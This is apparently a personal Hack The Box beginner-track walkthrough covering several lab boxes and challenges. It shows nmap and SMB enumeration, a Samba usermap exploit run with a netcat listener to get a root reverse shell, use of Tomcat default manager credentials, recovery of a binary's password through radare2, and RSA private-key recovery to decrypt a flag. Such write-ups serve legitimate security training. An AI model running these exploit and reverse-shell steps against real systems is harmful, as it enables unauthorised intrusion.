hack the box - beginner track
a short run of the CTF
1 - Box Lame
- OS: Linux
- Target IP:
10.10.10.3
# nmap scan
> nmap -sV -sC -vv 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
# probe anonymous ftp login
> ncftp -u anonymous 10.10.10.3
...
Login successful.
#--> sadly no items found
# check samba shares
# lists public shares on a server
> smbclient -L 10.10.10.3 -U%
# show a tree diagram of all the shares
> smbtree -b -N
# full smb enumeration
> enum4linux -a 10.10.10.3
# show details like permissions
> smbmap -H 10.10.10.3
# --> we got rw access om "/tmp"
# connect with user "anonymous" to "/tmp" share
> smbclient -N //10.10.10.3/tmp
# --> looking around but no cool stuff in there
# checking for CVE's
# nmap says
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian
# using searchsploit
> searchsploit vsftpd 2.3.4
> searchsploit Openssh 4.7p1
> searchsploit Samba 3.0
# --> got a lot of CVE`s
# vsftpd
> searchsploit -m unix/remote/49757.py
# small insert - short'n the route by using:
# "https://github.com/amriunix/CVE-2007-2447"
# usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
# after running this script we got root :)
> nc -lnvp 555
> python ./usermap_script.py 10.10.10.3 139 10.10.14.14 555
2 - Find The Easy Pass
- Challange: File
- Filetype: Exe
# download and extract password protected zip file
> unzip -P hackthebox Find\ The\ Easy\ Pass.zip
# inspect the exe
> file EasyPass.exe
EasyPass.exe: PE32 executable (GUI) Intel 80386, for MS Windows
# got a lot of more infos
> rabin2 -I EasyPass.exe
arch x86
baddr 0x400000
binsz 402432
bintype pe
bits 32
canary false
retguard false
class PE32
cmp.csum 0x00063785
compiled Sat Jun 20 00:22:17 1992
crypto false
endian little
havecode true
...
# deeper inspect with "objdump"
> objdump -s EasyPass.exe
# --> got a lot of infos, lets play a little bit
> objdump -s EasyPass.exe | grep -i 'pass\|valid\return\|wrong\|0x'
40d970 c3000000 ffffffff 02000000 30780000 ............0x..
428d10 38584500 e48a4200 30584500 dc8a4200 8XE...B.0XE...B.
42ad00 00000028 000c5061 7373776f 72644368 ...(..PasswordCh
454200 57726f6e 67205061 7373776f 72642100 Wrong Password!.
45e5d0 68306c30 70307430 78307c30 80308430 h0l0p0t0x0|0.0.0
460860 50305430 58307030 90309830 9c30a030 P0T0X0p0.0.0.0.0
462a60 25303f30 43304730 4c305830 5c308630 %0?0C0G0L0X0\0.0
462ef0 48304c30 50305430 58305c30 60306430 H0L0P0T0X0\0`0d0
462f00 68306c30 70307430 78307c30 80308430 h0l0p0t0x0|0.0.0
4682b0 65722050 61737377 6f726400 00055445 er Password...TE
468330 65636b20 50617373 776f7264 08546162 eck Password.Tab
# --> if the instruction "Wrong Password" will bring us on the right path?
454200 57726f6e 67205061 7373776f 72642100 Wrong Password!.
# using rabin2 with the "-z" option for really nice table view
> rabin2 -z EasyPass.exe | grep -i pass
469 0x000622ad 0x004682ad 14 15 .rsrc ascii Enter Password
481 0x0006232e 0x0046832e 23 24 .rsrc ascii Check Password\bTabOrder
# using a decompiler to get more infos - radare2 is a crazy cmd line tool ;)
> radare2 EasyPass.exe
-- THE ONLY WINNING MOVE IS NOT TO PLAY.
[0x00454450]> aa # analyze the binary
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x00454450]> aaa # analyze the binary a bit more
[Invalid function name 'sub.user32.dll_GetWindowThreadProcessId' at 0x0040699c
Invalid function name 'sub.user32.dll_GetWindow' at 0x00406964
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00454450]> aav # analyzing program structure and discovering functions
[x] Finding xrefs in noncode section with anal.in=io.maps
[x] Analyze value pointers (aav)
[x] Value from 0x00454600 to 0x00455000 (aav)
[x] 0x00454600-0x00455000 in 0x454600-0x455000 (aav)
[x] 0x00454600-0x00455000 in 0x401000-0x454600 (aav)
[x] Value from 0x00401000 to 0x00454600 (aav)
[x] 0x00401000-0x00454600 in 0x454600-0x455000 (aav)
[x] 0x00401000-0x00454600 in 0x401000-0x454600 (aav)
[0x00454450]> s entry0 # get on the entry point of the program
[0x00454450]> izz | grep -i pass # search again for the buzzword "pass"
2808 0x0002a105 0x0042ad05 13 14 CODE ascii \fPasswordChar
5483 0x00053600 0x00454200 15 16 CODE ascii Wrong Password!
7072 0x000622ad 0x004682ad 14 15 .rsrc ascii Enter Password
7084 0x0006232e 0x0046832e 23 24 .rsrc ascii Check Password\bTabOrder
[0x00454450]> s 0x00454200 # get on the start point "Wrong Password" we found above
[0x00454450]> V # starts the visual mode - "p" and "P" switch the view mode
[0x00454450]> V # starts the visual mode - "p" and "P" switch the view mode
# --> if we scroll quite above we can find a string printing "Good Job, Congratulation"
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF comment
0x004541d0 2100 0000 ffff ffff 1900 0000 476f 6f64 !...........Good ; aav.0x004541d0 ; aav.0x004541dc
0x004541e0 204a 6f62 2e20 436f 6e67 7261 7475 6c61 Job. Congratula
0x004541f0 7469 6f6e 7300 0000 ffff ffff 0f00 0000 tions...........
0x00454200 5772 6f6e 6720 5061 7373 776f 7264 2100 Wrong Password!. ; aav.0x00454200
# we need to find the reference "0x004541dc" from the comment section
[0x0045412b]> axt 0x4541dc # (A cross(X)-reference To)
(nofunc) 0x454138 [DATA] mov eax, aav.0x004541dc
[0x00454450]> V # enter the visual mode again
# lets change the view to "[xaDvc]" with uppercase "P" and scroll to "0x00454138"
# now we see the called function "call fcn.00427a30"
0x00454138 b8dc414500 mov eax, aav.0x004541dc ; "Good Job. Congratulations"
0x0045413d e8ee38fdff call fcn.00427a30 ;[1]
0x00454142 eb0a jmp 0x45414e
; CODE XREF from aav.0x00454070 @ +0xc6
0x00454144 b800424500 mov eax, aav.0x00454200 ; "Wrong Password!"
0x00454149 e8e238fdff call fcn.00427a30 ;[1]
# the function is two times listet - once for rejected and once for accepted password
# if we scroll more up we see often the "call fcn.004042b4" > here we have our password :)
0x00454093 ba88414500 mov edx, aav.0x00454188 ; "f"
0x00454098 e81702fbff call fcn.004042b4 ;[1]
0x0045409d 8d45f4 lea eax, [ebp - 0xc]
0x004540a0 ba94414500 mov edx, aav.0x00454194 ; "o"
0x004540a5 e80a02fbff call fcn.004042b4 ;[1]
0x004540aa 8d45f0 lea eax, [ebp - 0x10]
0x004540ad baa0414500 mov edx, aav.0x004541a0 ; "r"
0x004540b2 e8fd01fbff call fcn.004042b4 ;[1]
0x004540b7 8d45ec lea eax, [ebp - 0x14]
0x004540ba baac414500 mov edx, aav.0x004541ac ; "t"
0x004540bf e8f001fbff call fcn.004042b4 ;[1]
CODE XREF from aav.0x00454050 @ +0x5
0x004540c4 8d45e8 lea eax, [ebp - 0x18]
0x004540c7 baa0414500 mov edx, aav.0x004541a0 ; "r"
0x004540cc e8e301fbff call fcn.004042b4 ;[1]
0x004540d1 8d45e4 lea eax, [ebp - 0x1c]
0x004540d4 bab8414500 mov edx, aav.0x004541b8 ; "a"
0x004540d9 e8d601fbff call fcn.004042b4 ;[1]
0x004540de 8d45e0 lea eax, [ebp - 0x20]
0x004540e1 bac4414500 mov edx, aav.0x004541c4 ; "n"
0x004540e6 e8c901fbff call fcn.004042b4 ;[1]
0x004540eb 8d45dc lea eax, [ebp - 0x24]
0x004540ee bad0414500 mov edx, aav.0x004541d0 ; "!"
0x004540f3 e8bc01fbff call fcn.004042b4 ;[1]
3 - Weak RSA
- Challange: File
- Filetype: Public Key
# download and extract password protected zip file
> unzip -P hackthebox Weak\ RSA.zip
# we've got 2 files
flag.enc
key.pub
# lets see whats in the pub.key
> cat key.pub
-----BEGIN PUBLIC KEY-----
MIIBHzANBgkqhkiG9w0BAQEFAAOCAQwAMIIBBwKBgQMwO3kPsUnaNAbUlaubn7ip
4pNEXjvUOxjvLwUhtybr6Ng4undLtSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy
23CZuOl3WIsLiRKSVYyqBc9d8rxjNMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3
RQP/6p5hv1PYcWmErEeDewKBgGEXxgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpD
qlqqOFD8JA5UFK0roQkOjhLWSVu8c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ
4gYo6Ax+U7q6TOWhQpiBHnC0ojE8kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8sr
lb/N
-----END PUBLIC KEY-----
# okay - a good docu about SSLkeys is in the debian wiki
# see: https://wiki.debian.org/SSLkeys
# lets try "RsaCtfTool" and dump parameter
> rsactftool --dumpkey --key key.pub
n: 5731778245796309116684692727125478654435566540861901047227955\
0975689167002325903127543350912148103033159856937938350592831549\
5462888788593695945321417676298471525243254143375622365552296949\
4139206792905357171723195620643089373425674836904865928683527630\
21360051776130919666984258847567032959931761686072492923
e: 6818092863128414721282050719260573463203552413113993861806957\
5375591806315288775310503696874509130847529572462608728019290710\
1496613002461380365793420795804347773441112454951879278811321383\
5795874497424336596220483508975398766739551168282939127671435958\
2055290140617797814443530797154040685978229936907206605
# okay lets try to extract the priv_key from public_key
> rsactftool --publickey ./key.pub --private
private argument is not set, the private key will \
not be displayed, even if recovered.
[*] Testing key key.pub.
# maybe a error caused by missed dependencies
# i've cloned the git repo and install the requirements
> pip3 install -r "requirements.txt"
# this one caused trouble
# issue is already closed
> pip uninstall PyCrypto
> pip uninstall PyCryptodome
> pip install PyCryptodome
# after another try - no results - maybe a bug...
# i've tried a fork of the tool
> git clone https://github.com/daedalus/RsaCtfTool
> python RsaCtfTool/RsaCtfTool.py --publickey ./key.pub --private
# bingo :)
Private key :
-----BEGIN RSA PRIVATE KEY-----
MIICOQIBAAKBgQMwO3kPsUnaNAbUlaubn7ip4pNEXjvUOxjvLwUhtybr6Ng4undL
tSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy23CZuOl3WIsLiRKSVYyqBc9d8rxj
NMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3RQP/6p5hv1PYcWmErEeDewKBgGEX
xgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpDqlqqOFD8JA5UFK0roQkOjhLWSVu8
c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ4gYo6Ax+U7q6TOWhQpiBHnC0ojE8
kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8srlb/NAiBhwngxi+Cbie3YBogNzGJV
h10vAgw+i7cQqiiwEiPFNQJBAYXzr5r2KkHVjGcZNCLRAoXrzJjVhb7knZE5oEYo
nEI+h2gQSt1bavv3YVxhcisTVuNrlgQo58eGb4c9dtY2blMCQQIX2W9IbtJ26KzZ
C/5HPsVqgxWtuP5hN8OLf3ohhojr1NigJwc6o68dtKScaEQ5A33vmNpuWqKucecT
0HEVxuE5AiBhwngxi+Cbie3YBogNzGJVh10vAgw+i7cQqiiwEiPFNQIgYcJ4MYvg
m4nt2AaIDcxiVYddLwIMPou3EKoosBIjxTUCQQCnqbJMPEQHpg5lI6MQi8ixFRqo
+KwoBrwYfZlGEwZxdK2Ms0jgeta5jFFS11Fwk5+GyimnRzVcEbADJno/8BKe
-----END RSA PRIVATE KEY-----
# lets decrypt the file
> openssl rsautl \
-decrypt \
-in ./flag.enc \
-out ./flag.txt \
-inkey ./key.priv
# woohoo - we've got the flag xD
4 - Jerry
- OS: Windows
- Target IP:
10.10.10.95
# nmap scan
> nmap -sV -sC -vv 10.10.10.95
Discovered open port 8080/tcp on 10.10.10.95
# port 8080 - apache tomcat
8080/tcp open http syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
# check the searchsploit db for cve`s
> searchsploit tomcat 7.0.88
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload By | windows/webapps/42953.txt
----------------------------------------------------------------------------- ---------------------------------
# get the python exploit
> searchsploit -m 42966
# check the exploit
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
# run check first
> python 42966.py -u 10.10.10.95:8080
requests.exceptions.InvalidSchema: No connection adapters were found for '10.10.10.95:8080
# get the txt file
> searchsploit -m 42953
> cat 42953
E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
# okay, we need to put the content of this file on the server and pull the request URL
# on server HTTP PUTs has to be enabled
# this has to be done on the admin interface - lets check the interface
> nikto -h 10.10.10.95:8080
...
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
...
# default account
ID: tomcat
PW: s3cret
# lets try to login into manger-app
> elinks 10.10.10.95:8080/manager/html
# bingo :)
Tomcat Web Application Manager
┌────────────┬───────────┐
│Message: │OK │
└────────────┴───────────┘
5 - You Know 0xDiablo
- Challange: File
- Filetype: ?
# download and extract password protected zip file
> unzip -P hackthebox You\ know\ 0xDiablos.zip
Archive: You know 0xDiablos.zip
skipping: vuln need PK compat. v5.1 (can do v4.6)
# okay this wont work > next try
> 7z x You\ know\ 0xDiablos.zip -phackthebox
Everything is Ok
# we've got a file called "vuln" - lets check what this is
> cat vuln
ELF484
...
tii libc.so.6_IO_stdin_usedexitfopenputsprintffgetsstdoutsetresgidgetegidsetvbuf__libc_start_mainGLIBC_2.1GLIBC_2.0__gmon_start__ii
...
[^_]ÍvË,$_[rflag.txtHurry up and try in on server side.You know who are 0xDiablos: P
...
GCC: (Debian 8.3.0-19) 8.3́.0
# nice - looks likes unformated C code or something that can compiled with GCC